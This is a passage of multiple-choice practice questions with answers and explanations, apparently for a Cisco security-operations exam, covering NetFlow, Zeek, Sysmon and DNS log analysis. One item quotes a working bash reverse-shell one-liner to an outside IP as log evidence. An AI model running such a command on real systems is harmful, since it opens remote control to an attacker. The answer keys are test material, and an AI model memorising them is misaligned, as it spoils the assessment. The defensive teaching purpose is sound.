A single host pushing 4.2 GB to one external address in 40 minutes, hundreds of times above its own baseline, matches bulk outbound transfer behavior. The missing proxy log means the session did not traverse the inspected path, so content was likely TLS-encrypted and uninspected. NetFlow alone cannot prove exfiltration, but it strongly supports this hypothesis and warrants escalation.

Why this answer

NetFlow provides metadata such as byte counts, duration, ports, and endpoints without payload. When one host suddenly sends gigabytes to a single external address far above its baseline and no proxy record exists, the strongest supported hypothesis is bulk outbound transfer, consistent with exfiltration or staged upload. The absence of proxy inspection suggests the session avoided the monitored path, reinforcing the need to escalate and correlate with endpoint and DNS telemetry.

Exam trap

The trap here is assuming that traffic on TCP 443 is inherently safe because it is HTTPS, when the port number says nothing about whether the transfer is authorized or inspected.

102
MCQhard

An analyst investigates a Linux web server and finds a bash process spawned by the Apache user, with its parent process being httpd. The bash process has an outbound connection to an external IP on port 443, and the server's audit log shows the command 'bash -i >& /dev/tcp/198.51.100.22/443 0>&1'. Which security monitoring technique most reliably detects this specific attack pattern across the environment?

A.NetFlow analysis for long-duration connections from the web server
B.Signature-based network intrusion detection for outbound TLS to port 443
C.File integrity monitoring on the Apache document root directories
D.Endpoint process lineage and command-line monitoring for shell spawning from web server processes
AnswerD

The attack is defined by httpd spawning bash with a reverse shell command line, which endpoint telemetry captures directly. Monitoring process lineage and command-line arguments detects this pattern regardless of the destination IP or port, making it robust against infrastructure changes. This technique also generalizes to similar web shell and reverse shell abuses across the environment.

Why this answer

The attack signature is a web server process spawning an interactive shell that opens an outbound connection, captured in the process tree and command line. Endpoint process lineage and command-line monitoring detects this directly and does not depend on the external IP or port. Network signatures, file integrity monitoring, and flow analysis lack the process context needed to reliably isolate this behavior.

Exam trap

The trap here is focusing on the outbound connection to port 443 and building a network signature, when the decisive evidence is the shell process spawned by the web server.

103
MCQeasy

Which protocol and port combination is used by SNMP for receiving traps?

A.TCP 161
B.UDP 161
C.UDP 162
D.TCP 162
AnswerC

SNMP traps are unsolicited notifications pushed by agents to a manager, so the manager must listen on a dedicated port rather than the agent's UDP 161. UDP 162 satisfies this scenario's requirement for receiving traps, since trap delivery is fire-and-forget over UDP with no acknowledgement or session setup.

Why this answer

SNMP traps are unsolicited notifications sent from an SNMP agent to the network management system (NMS) to alert it of significant events. The correct protocol and port combination for receiving SNMP traps is UDP port 162, as defined in RFC 1157. UDP is used because traps are lightweight, connectionless messages where reliability is handled by the application layer if needed.

Exam trap

Cisco often tests the distinction between UDP port 161 (for SNMP queries) and UDP port 162 (for SNMP traps), and the trap here is that candidates confuse the port numbers or incorrectly assume SNMP uses TCP for traps due to familiarity with TCP-based protocols like HTTP or SSH.

How to eliminate wrong answers

Option A is wrong because TCP port 161 is used for SNMP queries (GET, GETNEXT, SET) from the manager to the agent, not for receiving traps, and SNMP typically uses UDP, not TCP. Option B is wrong because UDP port 161 is the standard port for SNMP agent communication (queries and responses), not for trap reception. Option D is wrong because TCP port 162 is not used for SNMP traps; SNMP traps always use UDP port 162, as TCP's connection-oriented overhead is unnecessary for one-way trap delivery.

104
Multi-Selectmedium

A SOC analyst is investigating a potential data exfiltration incident. Which TWO indicators from NetFlow/IPFIX analysis would most strongly suggest data exfiltration?

Select 2 answers
A.Consistent traffic at regular intervals to an external IP
B.Connection to an IP address flagged as malicious in threat intelligence
C.Multiple connection attempts to various ports on the same external IP
D.High volume of data transferred to a single external IP address
E.Low volume of traffic to multiple external IPs
AnswersB, D

A flow to an IP listed in threat intelligence links internal traffic to known malicious infrastructure, a strong exfiltration indicator. Unlike volume alone, this reputation match ties the connection to adversary-controlled endpoints, satisfying the requirement for corroborating evidence of compromise.

Why this answer

Option B is correct because a NetFlow/IPFIX record showing a connection to an IP address flagged as malicious by threat intelligence directly ties the flow to known adversary infrastructure, which is a strong contextual indicator of exfiltration (or command-and-control) rather than benign traffic. Option D is correct because a high volume of data transferred outbound to a single external IP address is a classic exfiltration signature — large byte/packet counts in one direction toward an external destination indicate bulk data movement, consistent with stolen data being sent to an attacker-controlled host. Option A is not the strongest indicator here because consistent traffic at regular intervals more typically suggests beaconing/C2 check-ins than bulk exfiltration, and it can also reflect legitimate scheduled traffic.

Option C does not belong because multiple connection attempts to various ports on the same external IP is characteristic of port scanning or reconnaissance, not data exfiltration. Option E does not belong because low-volume traffic to multiple external IPs is more consistent with normal web browsing or DNS activity and lacks the volume and concentration expected in exfiltration.

Exam trap

200-201 often tests the difference between C2 beaconing (regular small flows) and exfiltration (large outbound volume) — the trap is picking 'consistent intervals' when the question asks about data exfiltration specifically.

105
MCQmedium

A security analyst is using NetFlow data to investigate a potential data exfiltration incident. Which NetFlow metric is most useful for identifying large volumes of data being transferred to an external IP address?

A.Source port
B.Destination IP
C.Bytes transferred
D.Packet count
AnswerC

Bytes transferred quantifies the actual data volume moved between endpoints, directly exposing abnormally large outbound transfers to external addresses. Flow counts or packet totals alone cannot reveal payload size, so this metric best satisfies the stem's requirement to identify bulk exfiltration.

Why this answer

The 'Bytes transferred' metric in NetFlow directly quantifies the volume of data sent to a specific destination IP. In a data exfiltration scenario, an unusually high byte count to an external IP is a strong indicator of large-scale data transfer, whereas other metrics like source port or packet count do not directly measure data volume.

Exam trap

Cisco often tests the misconception that packet count is equivalent to data volume, but the trap here is that packet count ignores packet size, making bytes transferred the definitive metric for data volume in exfiltration analysis.

How to eliminate wrong answers

Option A is wrong because the source port is typically a random ephemeral port (e.g., 49152-65535) used for the session and does not indicate data volume or exfiltration intent. Option B is wrong because while the destination IP identifies where data is sent, it alone does not measure the amount of data transferred; a single IP could receive both normal and exfiltration traffic. Option D is wrong because packet count does not account for packet size; a high packet count with small packets (e.g., DNS queries) could be benign, whereas a low packet count with large packets (e.g., 1500-byte MTU) could indicate exfiltration.

106
MCQmedium

A SOC analyst monitoring Cisco Stealthwatch Enterprise notices a host inside the network is receiving NetFlow records showing repeated inbound connections on TCP port 3389 from multiple external IP addresses over a short period. The host is a workstation, not a server. Which action should the analyst take first?

A.Restart the workstation to terminate any active RDP sessions and clear potential malware from memory.
B.Block TCP port 3389 inbound on the perimeter firewall for all internal hosts.
C.Investigate the workstation for signs of compromise and determine whether it is running an unauthorized RDP service.
D.Add the external IP addresses to the firewall blocklist and close the incident.
AnswerC

A workstation receiving inbound RDP connections from multiple external IPs is highly suspicious because workstations should not expose RDP to the internet. The analyst should first investigate the endpoint to confirm whether an attacker has enabled RDP or installed a backdoor, gather evidence, and then contain the incident appropriately.

Why this answer

Inbound RDP traffic to a workstation from multiple external sources is a strong indicator that the host may be compromised and running an unauthorized remote access service. The correct first step is to investigate the endpoint to confirm the compromise and gather evidence before taking containment actions. This aligns with the incident response process of identification and scoping before eradication.

Exam trap

The trap here is assuming that blocking the external IPs or the port immediately resolves the incident, when the real issue is the potentially compromised internal host that must be investigated first.

107
MCQhard

During an incident response, an analyst extracts a file from network traffic using Zeek's file analysis feature. The file has a SHA-256 hash that matches a known malware indicator. Which type of IoC is this?

A.Behavioral IoC
B.Network-based IoC
C.Host-based IoC
D.File-based IoC
AnswerD

A SHA-256 hash is a cryptographic file fingerprint, so matching it to a known indicator identifies the artefact itself rather than network behaviour or infrastructure. This satisfies the stem's constraint: the IoC derives from the extracted file's content, making it file-based rather than network- or host-based.

Why this answer

A file-based IoC is an indicator derived from a file artifact — such as a hash (MD5, SHA-1, SHA-256), filename, or file path — that identifies malicious content. Since the analyst extracted a file and matched its SHA-256 hash against a known malware indicator, this is a file-based IoC, regardless of the fact that the file was captured from network traffic.

Exam trap

The trap is assuming that because the file was extracted from network traffic, the IoC must be 'network-based' — but the IoC type is determined by the indicator's nature (a file hash), not the collection method.

How to eliminate wrong answers

Option A is wrong because behavioral IoCs describe patterns of activity (e.g., unusual process chains, beaconing intervals) rather than static file attributes like hashes. Option B is wrong because network-based IoCs are indicators tied to network artifacts such as IP addresses, domains, URLs, or JA3 fingerprints — the file's hash is not a network indicator even though it was extracted from traffic. Option C is wrong because host-based IoCs relate to host artifacts like registry keys, file paths on disk, or scheduled tasks, not a hash matched from a captured file.

108
MCQmedium

An analyst suspects data exfiltration via DNS. Which log type would provide the most relevant information to confirm this?

A.Web server logs
B.Firewall logs
C.DNS logs
D.IDS/IPS alerts
AnswerC

DNS tunnelling encodes stolen data within query and response records, so DNS logs capture the queried names, record types, sizes and frequencies needed to spot anomalous exfiltration patterns. They directly satisfy the requirement to confirm data leaving via DNS.

Why this answer

DNS logs capture all DNS queries and responses, including the domain names being resolved. Data exfiltration via DNS often involves encoding stolen data into DNS queries (e.g., subdomains of a controlled domain). By examining DNS logs for unusual query patterns, high query volumes, or long, random-looking subdomains, an analyst can directly confirm exfiltration activity.

Exam trap

Cisco often tests the distinction between logs that record metadata (firewall logs) versus logs that record application-layer payloads (DNS logs), leading candidates to mistakenly choose firewall logs because they think 'all traffic passes through the firewall'.

How to eliminate wrong answers

Option A is wrong because web server logs record HTTP/HTTPS requests and responses, not DNS queries; they would miss exfiltration that uses DNS tunneling. Option B is wrong because firewall logs track allowed or denied network connections based on IP addresses and ports, but they do not log the content of DNS queries (the domain names themselves), making them insufficient for detecting DNS-based data exfiltration. Option D is wrong because IDS/IPS alerts are generated based on signatures or anomalies, but they may not capture the raw DNS query data needed to confirm exfiltration; they can raise alerts but do not provide the detailed query logs required for definitive analysis.

109
Multi-Selecteasy

Which TWO of the following are examples of Indicators of Compromise (IoCs) used in network security monitoring? (Choose two.)

Select 2 answers
A.MD5 hash of a malicious executable
B.IP addresses of known command and control servers
C.The current time of day
D.The company's stock price
E.The number of employees in the company
AnswersA, B

An MD5 hash uniquely identifies a known malicious file, so matching it against endpoint or network telemetry flags that exact executable without ambiguity. This satisfies the stem's requirement for a concrete, observable artefact left behind by an intrusion, unlike behavioural baselines or policy configurations, which describe normal states rather than evidence of compromise.

Why this answer

Option A is correct because an MD5 hash of a malicious executable is a classic host-based/file-based IoC: the cryptographic digest uniquely identifies known malware and can be matched against threat-intelligence feeds or SIEM/file-integrity rules. Option B is correct because IP addresses of known command-and-control (C2) servers are network-based IoCs that can be detected via firewall logs, IDS/IPS signatures, or NetFlow analysis of outbound connections. Option C is not an IoC, since the time of day is merely contextual metadata and not an artifact indicating compromise.

Option D is not an IoC, as a company's stock price has no bearing on security telemetry. Option E is not an IoC, because employee headcount is an organizational metric, not evidence of malicious activity.

Exam trap

Cisco often tests the distinction between IoCs (specific, actionable artifacts of compromise) and unrelated contextual data (like time, stock price, or employee count) to see if candidates understand that IoCs must directly indicate malicious activity, not just general system or business information.

110
Multi-Selecteasy

A network analyst is creating a baseline for normal network traffic. Which TWO metrics should be included to establish a baseline?

Select 2 answers
A.Average bandwidth usage over time
B.Excessive connection attempts from a single IP
C.Peak traffic times
D.Typical protocol distribution (e.g., HTTP vs DNS)
E.Unusual payload sizes
AnswersA, D

Average bandwidth usage over time establishes the quantitative normal for link utilisation, so deviations such as spikes or sustained increases become detectable. This metric underpins anomaly-based monitoring, satisfying the baseline requirement for measurable traffic volume.

Why this answer

Option A (Average bandwidth usage over time) is correct because a traffic baseline must capture the normal volume of data traversing the network, and averaging utilization over representative periods establishes the expected throughput level against which anomalies can be measured. Option D (Typical protocol distribution, e.g., HTTP vs DNS) is correct because a baseline should document which protocols normally appear and in what proportions, so deviations such as unexpected SMB, IRC, or DNS tunneling traffic become detectable. Options B (Excessive connection attempts from a single IP) and E (Unusual payload sizes) describe anomalies or attack indicators rather than normal-behavior metrics, so they are things a baseline helps you identify, not components used to define the baseline itself.

Option C (Peak traffic times) is a useful contextual detail but is not one of the two core metrics for establishing a normal-traffic baseline in this scenario.

Exam trap

The trap here is confusing anomaly indicators (excessive connection attempts, unusual payload sizes) with baseline metrics — the exam expects you to recognize that baselines describe normal behavior, while anomalies are deviations from it.

111
MCQhard

An analyst receives a YARA rule that includes the string 'MZ' at the beginning of a file. What does this indicator typically help identify?

A.Windows executable files
B.PDF files with embedded JavaScript
C.Linux ELF binaries
D.Malicious documents containing macros
AnswerA

The ASCII bytes 'MZ' (0x4D5A) form the DOS header signature at offset zero of every Windows PE file, so a YARA rule matching 'MZ' at the start of a file identifies Windows executables. This satisfies the scenario's need to flag executable files by their magic number.

Why this answer

The string 'MZ' (0x4D 0x5A) is the magic number for the MS-DOS header, which is present at the very beginning of all Windows Portable Executable (PE) files, including .exe, .dll, and .sys files. A YARA rule that checks for 'MZ' at offset 0 is specifically targeting the PE file format, which is the standard executable format for Windows. This indicator helps an analyst quickly identify that a file is likely a Windows executable, regardless of its extension.

Exam trap

Cisco often tests the concept of file magic numbers to see if candidates confuse the 'MZ' signature of Windows executables with other common file headers, such as '%PDF' for PDFs or 'PK' for ZIP archives, leading them to select a plausible but incorrect option like malicious documents or PDFs.

How to eliminate wrong answers

Option B is wrong because PDF files with embedded JavaScript are identified by the '%PDF' magic number (0x25 0x50 0x44 0x46) at offset 0, not 'MZ'. Option C is wrong because Linux ELF binaries start with the ELF magic number (0x7F 0x45 0x4C 0x46), not 'MZ'. Option D is wrong because malicious documents containing macros (e.g., Office documents) typically start with the OLE2 Compound Document magic number (0xD0 0xCF 0x11 0xE0 0xA1 0xB1 0x1A 0xE1) or the ZIP-based Office Open XML signature ('PK'), not 'MZ'.

112
MCQeasy

A security analyst is reviewing firewall logs and notices that a workstation is making outbound connections to multiple external IP addresses on port 22 (SSH). The workstation is not authorized to use SSH for external connections. Which type of activity does this most likely indicate?

A.The workstation is being used as a jump host for legitimate remote administration.
B.The workstation is synchronizing time with external NTP servers over port 22.
C.The workstation is infected with malware attempting to establish SSH tunnels for data exfiltration or C2.
D.The workstation is performing a vulnerability scan against external hosts.
AnswerC

Unauthorized outbound SSH from a workstation to multiple external IPs is a strong indicator of malware using SSH for command and control or data exfiltration. Attackers often use SSH to blend in with legitimate traffic or to create encrypted tunnels.

Why this answer

Unauthorized outbound SSH from a workstation to multiple external IPs is highly suspicious. Attackers and malware often use SSH for encrypted C2 channels or data exfiltration because it blends with legitimate traffic. The lack of authorization and multiple destinations reinforce this as malicious activity.

Exam trap

The trap here is assuming that SSH traffic is always legitimate because it is encrypted; however, unauthorized SSH from a workstation can indicate malware or an attacker using it for covert channels.

113
Multi-Selectmedium

A security analyst is reviewing Sysmon telemetry from a workstation that may be compromised. Which TWO event types should the analyst correlate first to identify suspicious process execution and persistence? (Choose two.)

Select 2 answers
A.Event ID 1, Process Create, which records the image path, command line, and parent process.
B.Event ID 22, DNS Query, which records name resolution requests made by processes.
C.Event ID 13, Registry Value Set, which records registry modifications including value names and data.
D.Event ID 3, Network Connection, which records TCP and UDP connection attempts by processes.
E.Event ID 11, File Create, which records file creation and overwrite operations with their paths.
AnswersA, C

Process Create captures the executable path, full command line, user, hashes, and parent process identifier, which together reveal suspicious invocations such as encoded PowerShell or an unexpected child of a document reader. It is the primary Sysmon event for identifying malicious execution and building process lineage during triage, so it belongs in the first correlation step.

Why this answer

Process Create establishes what ran, from where, with which arguments, and under which parent, while Registry Value Set reveals the persistence the process installed. Correlating the two links a specific executable to a specific autorun or service entry, which is the fastest way to confirm suspicious execution and durable persistence on a Windows endpoint.

Exam trap

The trap here is selecting events by general security interest, such as DNS or network connections, instead of matching the event types to the specific investigative goals of execution and persistence.

114
MCQmedium

An analyst reviews Cisco ASA syslog messages and sees repeated entries with message ID 106023 denied inbound TCP from an external address to an internal web server on port 443. The web server is expected to receive inbound HTTPS traffic. What should the analyst investigate?

A.Whether the ASA is failing over to the standby unit
B.Whether the external address is a known malicious scanner
C.Whether the web server has a valid TLS certificate installed
D.Whether the access control list is blocking legitimate inbound HTTPS
AnswerD

Message 106023 indicates that a packet was denied by an ACL, and the destination port 443 with an expected inbound service strongly suggests a misconfigured or overly restrictive ACL. The analyst should review the interface ACL and any object group references to confirm whether the web server's public address is permitted. If the server is meant to receive HTTPS from the internet, the denial represents an availability issue rather than an attack, and the ACL must be corrected.

Why this answer

ASA syslog 106023 is generated when a packet is denied by an ACL. Because the internal web server is expected to accept inbound HTTPS, the repeated denials on port 443 point to an ACL that is preventing legitimate traffic. The analyst should inspect the interface ACL and object groups to confirm the web server's public address is permitted, treating this as an availability issue first.

Exam trap

The trap here is assuming any inbound denial is an attack, when an expected service being denied indicates a firewall ACL problem that affects legitimate users.

115
MCQeasy

A security analyst is examining a suspicious file and wants to determine its reputation and threat score. Which Cisco security solution should the analyst use to query the file's SHA-256 hash and get a verdict?

A.Cisco Umbrella
B.Cisco Identity Services Engine
C.Cisco Stealthwatch
D.Cisco Threat Grid
AnswerD

Cisco Threat Grid is a malware analysis and threat intelligence platform that allows analysts to submit files or hashes to obtain a threat score and behavioral analysis. It provides detailed reports on file reputation, making it the appropriate tool for this scenario.

Why this answer

Cisco Threat Grid is designed for malware analysis and threat intelligence, allowing analysts to submit file hashes and receive a threat score and behavioral report. The other options focus on DNS security, identity management, or network flow analysis, none of which provide file hash reputation.

Exam trap

The trap here is assuming that Cisco Umbrella can provide file hash reputation because it offers security intelligence, but its primary function is DNS-layer enforcement, not file analysis.

116
MCQmedium

A SOC analyst reviewing Cisco Firepower intrusion events notices that a single internal host generated hundreds of alerts for the same signature within a five-minute window, each with a different destination port on the same external IP. The analyst wants to reduce noise before escalating. Which action should the analyst take first?

A.Export the raw packet captures to a CSV file and archive them for compliance purposes.
B.Correlate the events by source IP and destination IP to determine whether this is a port sweep or a single exploit attempt.
C.Immediately block the internal host's IP address at the perimeter firewall to stop the activity.
D.Disable the signature that is generating the alerts because it is clearly producing false positives.
AnswerB

Correlating the events by source and destination IP reveals the pattern behind the alerts. Hundreds of alerts to the same external IP across different ports strongly suggest scanning or sweep behavior rather than a single exploit, which guides escalation decisions and helps the analyst avoid treating each alert as an isolated incident.

Why this answer

When many alerts share a source and destination but vary in port, the analyst should correlate them to identify the pattern. Grouping by IP pairs reveals whether the activity is a port sweep, a multi-vector exploit, or benign scanning. This context is essential before deciding on containment or tuning.

Exam trap

The trap here is assuming that a high volume of alerts automatically means a false positive, when it may instead indicate a real scanning or exploitation attempt.

117
MCQhard

A SOC analyst is investigating a Windows workstation that has been exhibiting unusual outbound connections. Reviewing Sysmon Event ID 3 (Network Connection) logs, the analyst notices a process named svchost.exe with a parent process of cmd.exe initiating connections to an external IP on port 4444. On a healthy system, svchost.exe is normally spawned by services.exe. Which conclusion is most strongly supported by these log entries?

A.A legitimate Windows service is making routine update connections
B.A scheduled task is running a legitimate administrative script
C.Malware is masquerading as svchost.exe to blend in while communicating with a command-and-control server
D.The system is experiencing a memory corruption issue causing process misattribution
AnswerC

Attackers commonly name malicious binaries svchost.exe or inject into the real process to evade casual inspection. The decisive evidence is the parent process: genuine svchost.exe is spawned by services.exe, so a cmd.exe parent indicates process masquerading or injection. The connection to port 4444, a frequent C2 and reverse-shell port, further supports malicious command-and-control activity requiring immediate investigation.

Why this answer

The strongest conclusion is process masquerading for command-and-control. Legitimate svchost.exe always has services.exe as its parent, so a cmd.exe parent reveals either a renamed malicious executable or code injected into a spawned process. Combined with an outbound connection to port 4444, a well-known reverse-shell and C2 port, the analyst should treat the host as compromised and begin containment and forensic triage.

Exam trap

The trap here is focusing on the process name svchost.exe as inherently benign, when the parent process and destination port are the discriminating evidence of compromise.

118
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. Which TWO of the following network behaviors are indicators of data exfiltration?

Select 2 answers
A.A high number of ICMP echo requests
B.A single host scanning multiple internal IPs
C.Multiple successful login attempts from a single IP
D.Frequent DNS queries to a known malicious domain
E.Unusually large outbound traffic from a single host
AnswersD, E

Repeated DNS queries to a known malicious domain indicate command-and-control or DNS-tunnelling exfiltration, where stolen data is encoded into query names. The known-malicious reputation plus frequency satisfies the exfiltration indicator requirement, unlike ordinary name resolution.

Why this answer

Option D is correct because frequent DNS queries to a known malicious domain indicate data exfiltration via DNS tunneling, where attackers encode stolen data in DNS query names or responses to bypass perimeter controls that typically allow DNS traffic. Option E is correct because unusually large outbound traffic from a single host is a classic exfiltration indicator, as compromised systems often transfer large volumes of data to external command-and-control or drop servers, deviating from normal baseline egress patterns. Option A is not correct because a high number of ICMP echo requests typically indicates a ping sweep or network reconnaissance/DoS activity rather than data exfiltration.

Option B is not correct because a single host scanning multiple internal IPs is characteristic of internal reconnaissance or lateral movement, not exfiltration of data outside the network. Option C is not correct because multiple successful login attempts from a single IP suggest credential-based access or brute-force success, which is an initial access or lateral movement indicator rather than data exfiltration.

Exam trap

The trap is confusing reconnaissance or initial access indicators (scanning, brute force, ICMP floods) with exfiltration indicators; exfiltration specifically involves outbound data transfer to an external entity.

119
MCQeasy

Which log type would an analyst examine to view details about HTTP methods (GET, POST), response codes, and user-agent strings?

A.Web server logs
B.System logs
C.Firewall logs
D.DNS logs
AnswerA

Web server logs record each HTTP request, capturing the method (GET, POST), status code and User-Agent header, so they directly satisfy the stem's requirement for those three fields. Other log types, such as firewall or authentication logs, lack this application-layer detail.

Why this answer

Web server logs record HTTP requests and responses, including methods, URLs, response codes, and user-agent information.

120
MCQmedium

An analyst is examining a firewall log entry: '2023-10-25 14:30:00 ACTION=DENY SRC=10.0.0.5 DST=203.0.113.50 PROTO=TCP SPT=445 DPT=445'. Which statement best describes this event?

A.An internal host attempted to establish an SMB connection to an external IP and was blocked.
B.A DNS query was made from an internal host to an external server.
C.An external host attempted to access an internal SMB server on port 445 and was blocked.
D.An internal host successfully connected to an external server on port 445.
AnswerA

Port 445 is SMB, and the DENY action confirms the firewall dropped the session. The log shows an internal host (10.0.0.5) initiating TCP/445 toward an external address, so the outbound SMB connection attempt was blocked.

Why this answer

The log entry shows a deny action for traffic from internal IP 10.0.0.5 to external IP 203.0.113.50 on TCP port 445, which is the default port for SMB (Server Message Block) protocol. Since the source is internal (RFC 1918 address) and the destination is external, this indicates an outbound connection attempt that was blocked by the firewall. SMB is commonly used for file sharing and is often restricted outbound to prevent data exfiltration or malware propagation.

Exam trap

Cisco often tests the ability to interpret firewall log fields (SRC, DST, ACTION, PROTO, SPT, DPT) and map them to network directionality, where candidates mistakenly reverse source/destination or confuse port numbers with unrelated protocols like DNS.

How to eliminate wrong answers

Option B is wrong because the log shows TCP port 445 (SMB), not UDP/TCP port 53 (DNS), and there is no indication of a DNS query in the fields. Option C is wrong because the source IP (10.0.0.5) is internal and the destination (203.0.113.50) is external, meaning this is an outbound attempt from an internal host, not an inbound attempt from an external host. Option D is wrong because the ACTION field is 'DENY', not 'ALLOW', so the connection was blocked, not successful.

121
Multi-Selectmedium

A SOC analyst is reviewing DNS logs and suspects that a host is communicating with a domain generation algorithm (DGA) used by malware. Which TWO characteristics in the DNS logs would most strongly support this suspicion? (Choose two.)

Select 2 answers
A.DNS queries using only TCP instead of UDP for all requests.
B.Repeated DNS queries for the same domain at precise, regular intervals.
C.A large number of NXDOMAIN responses for queries with long, nonsensical domain names.
D.A high volume of DNS queries for domains with seemingly random alphanumeric strings and varying top-level domains.
E.DNS queries for domains that resolve to private IP addresses within the corporate network.
AnswersC, D

DGA malware generates many domains, most of which are not registered, resulting in NXDOMAIN responses. A spike in NXDOMAIN for long, random-looking names is a classic DGA indicator, as the malware probes many candidates before finding an active C2 domain.

Why this answer

DGA malware generates numerous pseudo-random domain names to locate its C2 server. This results in a high volume of queries for random-looking domains, often with varied TLDs, and many NXDOMAIN responses for unregistered names. These two characteristics together strongly indicate DGA behavior.

Exam trap

The trap here is focusing on the protocol (TCP vs UDP) or regular intervals, which are not primary DGA indicators; the randomness and volume of domain names are the key signals.

122
MCQhard

A network security analyst is examining a packet capture in Wireshark and notices a series of TCP packets with the PSH, ACK flags set, and a payload containing the string 'cmd.exe /c whoami'. The packets are destined to port 445 on an internal server. Which type of malicious activity is most likely indicated?

A.DNS tunneling for data exfiltration
B.SMB lateral movement and command execution
C.SMTP email-based malware delivery
D.HTTP command-and-control communication
AnswerB

The combination of SMB port 445 and a command shell payload like 'cmd.exe /c whoami' strongly suggests an attacker using SMB for lateral movement and executing commands on a remote system. This is a common technique in ransomware and APT campaigns, where SMB is used to propagate and run commands.

Why this answer

The presence of SMB traffic on port 445 carrying a command shell payload such as 'cmd.exe /c whoami' is a strong indicator of lateral movement and remote command execution. Attackers often use SMB to move between systems and execute commands, making this the most likely malicious activity in the scenario.

Exam trap

The trap here is focusing on the PSH, ACK flags and assuming it is a generic data transfer, while overlooking the SMB port and the command execution string that point to lateral movement.

123
MCQeasy

A junior analyst is asked to determine which log source would best reveal an attacker attempting to authenticate to a Windows file server with stolen credentials over the network. Which source should the analyst consult first?

A.Windows Security event log entries for logon events, including the logon type and source workstation fields.
B.Application event log entries written by the installed line-of-business database engine.
C.Windows System event log entries generated by the Service Control Manager during service start and stop.
D.Windows Defender operational log entries recording scheduled scan completion status.
AnswerA

Security event IDs 4624 and 4625 capture successful and failed logons with fields such as Logon Type and Source Network Address, which directly expose network authentication attempts against the server. Logon Type 3 indicates a network logon such as SMB, making this the most direct evidence of credential use against the file server in the scenario.

Why this answer

Network authentication against a Windows file server is recorded in the Security log as logon events, which include the account, logon type, and originating address. Correlating successful and failed entries reveals password spraying, credential stuffing, or lateral movement with stolen credentials, making the Security log the correct first source for this question.

Exam trap

The trap here is choosing a log by file name familiarity instead of by the security question being asked, when only the Security log records account authentication events.

124
MCQhard

An analyst is investigating a potential data exfiltration incident. The only available data is NetFlow records from Cisco routers. Which NetFlow field would be most useful to identify large outbound transfers to an unusual external host?

A.Input interface and output interface
B.Next-hop IP address and autonomous system number
C.Destination IP address and byte count
D.Source port and TCP flags
AnswerC

NetFlow records include source/destination IP, ports, protocol, and byte/packet counts. To identify large outbound transfers, the destination IP and byte count are critical. An unusual external host receiving a high volume of bytes from an internal host suggests exfiltration. Other fields like source port or TCP flags are less directly indicative of data volume.

Why this answer

NetFlow records capture metadata about flows, including source/destination IP, ports, protocol, and byte/packet counts. To detect large outbound transfers to an unusual external host, the analyst should focus on the destination IP address and the byte count. A high byte count from an internal host to an external IP that is not a known service indicates potential exfiltration.

Other fields like source port, TCP flags, or interface information provide context but are not as directly useful for identifying data volume.

Exam trap

The trap here is focusing on connection-oriented fields like TCP flags or ports, which indicate the nature of the connection but not the volume of data transferred.

125
Multi-Selecthard

A SOC analyst is reviewing proxy logs and wants to identify indicators of potential data exfiltration over HTTP. Which two patterns should the analyst treat as suspicious? (Choose two.)

Select 2 answers
A.Large outbound POST requests to a single external IP address at regular intervals.
B.Outbound connections to a newly registered domain with a high volume of data uploaded.
C.HTTP 404 errors generated by users mistyping URLs in the browser.
D.Repeated GET requests to the same internal web server for static images.
E.Downloading software updates from a known vendor's HTTPS site.
AnswersA, B

Large outbound POST requests at regular intervals suggest automated data transfer to an external host. Legitimate user browsing rarely produces consistent, large uploads on a schedule. This pattern is consistent with exfiltration tools that beacon or upload data in chunks, making it a suspicious indicator worth investigating.

Why this answer

Exfiltration over HTTP often appears as large outbound uploads, especially to new or untrusted destinations. Regular large POST requests and high-volume uploads to newly registered domains both indicate data leaving the environment in a manner inconsistent with normal business traffic. These patterns warrant deeper investigation.

Exam trap

The trap here is focusing on inbound downloads or benign errors, when exfiltration is characterized by outbound uploads to suspicious destinations.

126
MCQmedium

A NetFlow analysis shows that a single internal IP sent 10 GB of data to an external IP within one hour, whereas the baseline for that host is typically 100 MB per day. Which type of activity does this indicate?

A.Denial of service attack
B.Network scanning
C.Normal business activity
D.Data exfiltration
AnswerD

A single host transferring 10 GB externally within an hour, vastly exceeding its 100 MB daily baseline, indicates bulk data movement outbound. This volume anomaly, visible in NetFlow byte counters, is characteristic of data exfiltration rather than normal business traffic or routine backup activity.

Why this answer

The massive outbound transfer of 10 GB from an internal host to an external IP, far exceeding the 100 MB/day baseline, is a classic indicator of data exfiltration. Exfiltration involves unauthorized data transfer from inside the network to an external destination, often after a compromise. The volume and direction (internal to external) align with this activity, not with inbound flooding or scanning.

Exam trap

The trap here is confusing the direction and volume of traffic: candidates might associate large transfers with DoS or scanning, but exfiltration is characterized by outbound data from internal to external, often in large volumes.

How to eliminate wrong answers

Option A is wrong because a denial of service attack typically involves a high volume of inbound traffic or resource exhaustion, not a large outbound transfer from a single internal host. Option B is wrong because network scanning generates many small connections to multiple ports or hosts, not a single large outbound data transfer. Option C is wrong because normal business activity would not deviate so drastically from the established baseline without a known business justification.

127
MCQhard

A security analyst is reviewing Zeek connection logs and sees the following entry: '192.168.1.10:12345 > 10.0.0.1:80 (tcp) duration 0.001 sec, service http, bytes 60, state S0'. Based on the state 'S0', what does this indicate about the connection?

A.Data was transferred successfully and the connection closed normally.
B.A SYN packet was sent but no reply was received.
C.The connection was established successfully.
D.The connection was reset by the remote host.
AnswerB

Zeek's S0 state records a connection attempt where the originator sent a SYN but received no SYN-ACK, so the handshake never completed. This matches the stem's unanswered SYN, distinguishing it from established (SF) or reset (RST) states.

Why this answer

In Zeek, S0 indicates that a SYN packet was sent but no SYN-ACK was received (connection attempt without completion). This could be part of a port scan or a half-open connection.

128
MCQmedium

A security analyst is using Zeek to analyze network traffic. Which Zeek log would be most useful for identifying HTTP requests to a known malicious domain?

A.http.log
B.ssl.log
C.conn.log
D.dns.log
AnswerA

Zeek's http.log records HTTP request metadata including the Host header and URI, so requests to a known malicious domain are directly visible there. conn.log lacks application-layer detail, and dns.log only captures name resolution, not the subsequent HTTP request itself.

Why this answer

Zeek's http.log records all HTTP requests and responses, including the host header, URI, method, and user agent. To identify HTTP requests to a known malicious domain, the http.log is the most direct source because it contains the destination host and URL. Analysts can search this log for the malicious domain in the 'host' or 'uri' fields.

Exam trap

The trap is selecting dns.log because it shows domain lookups, but the question asks for HTTP requests, which are only fully captured in http.log; candidates must distinguish between resolution and actual request.

How to eliminate wrong answers

